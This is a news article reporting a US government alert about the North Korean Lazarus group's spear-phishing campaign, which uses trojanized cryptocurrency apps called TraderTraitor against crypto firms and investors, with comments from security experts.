Skip links

US warns North Korean Lazarus gang rises against cryptocurrency outfits

The North Korean-based criminal group Lazarus is expanding its attacks into the blockchain and crypto space, three agencies of the US government have warned.

The state-sponsored gang is sending large numbers of spear-phishing messages to employees of cryptocurrency companies on a range of communications platforms that – as with the campaigns against chemical and IT firms – often look like recruitment offers for high-paying jobs, according to an alert this week from the FBI, Cybersecurity and Infrastructure Security Agency (CISA) and the Treasury Department.

These emails ultimately are written to entice the mark into running some attached malicious software.

“This campaign combines multiple popular trends into an attack,” Tim Erlin, vice president of strategy at cybersecurity firm Tripwire, told The Register.

“The alert from CISA describes a spear-phishing campaign that leverages the hot job market to entice users into downloading malicious cryptocurrency software. We’ve certainly seen attacks focused on cryptocurrency before, and malicious software isn’t new. It’s important that readers understand that this alert isn’t about a new technology, but increased attack activity.”

Specifically, the messages carry trojans encouraging recipients to open and run cryptocurrency-themed malware that the agencies call TradeTraitor.

“The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework,” the agencies warn.

“The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications.”

The goal is to get into a victim’s system to spread more malware on the network, steal funds and private keys, and run fraudulent blockchain transactions.

Lazarus – also known as APT38, BlueNoroff, and Stardust Chollima – is casting a wide net with this campaign, with targets including cryptocurrency exchanges, decentralized finance protocols, pay-to-earn cryptocurrency video games, and crypto-coin trading companies. Also in the crosshairs are venture capital funds investing in cryptocurrencies and people holding large amounts of cryptocurrency or non-tangible tokens (NTFs).

Within the companies, Lazarus often sends its spear-phishing messages to those working in system administration and DevOps roles.

JavaScript capable of running on Windows and macOS provides the core functionality of the malware; this includes a function with a name like UpdateCheckSync() that downloads and executes malicious payloads. The TraderTraitor apps come with a range of names, such as DAFOM, which purports to be a cryptocurrency portfolio app; TokenAIS and CryptAIS, for building AI-based trading portfolios for cryptocurrencies; and Esilet, for live cryptocurrency prices.

The downloaded payloads include updated variants of the custom remote access trojan (RAT) Manuscrypt for Windows and macOS that collects information and can execute arbitrary commands and download additional payloads like the North Korean CopperHedge RAT.

Horse, meet stable door

Lazarus has been targeting the cryptocurrency market since at least 2020, and last year US government agencies issued an alert about Lazarus’ AppleJeus malware, which has been used to steal cryptocurrency from organizations around the globe. AppleJeus continues to be a problem: Google last month said it stopped efforts by Lazarus to exploit a flaw in Chrome using the malware.

More recently, the FBI said the threat group was responsible for the theft of $620 million in cryptocurrency from the Ronin Network, an Ethereum-based network that supports Axie Infinity, a blockchain video game. The US Treasury also said last week said it was placing fresh sanctions on a Lazarus-controlled Ethereum wallet.

In addition, Uncle Sam last week offered a reward of up to $5 million for information that helps disrupt North Korea’s illicit cyber-activities, including the theft of cryptocurrency as well as cyber-espionage.

In the latest alert, the US agencies wrote that given its history, Lazarus “will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets.”

The digital asset space has become a tempting target not only for Lazarus but many other cybercriminals because of the relative newness of it and the rapid growth of users of cryptocurrency and NFTs.

“Since cryptocurrency is a rather new technology, it presents an opportunity for threat actors to socially engineer targets,” Hank Schless, senior manager of security solutions at Lookout, told The Register.

“Crypto investors are constantly looking for an edge in the market or what the next big currency that’s going to explode in value. Attackers can use this thirst for information to get users to download malicious apps or share login credentials for legitimate trading platforms they use.”

For North Korea, targeting cryptocurrency and similar assets will continue, John Bambenek, principal threat hunter at Netenrich, told The Register.

“North Korea has been focused on cryptocurrency threats for years because they are a highly-sanctioned country and this lets them acquire assets they can use to further their governmental objectives,” Bambenek said.

“This will continue until North Korea becomes a respectable member of the international community or the sweet meteor of death finally comes and ends all life on earth. The latter is the more accurate scenario.” ®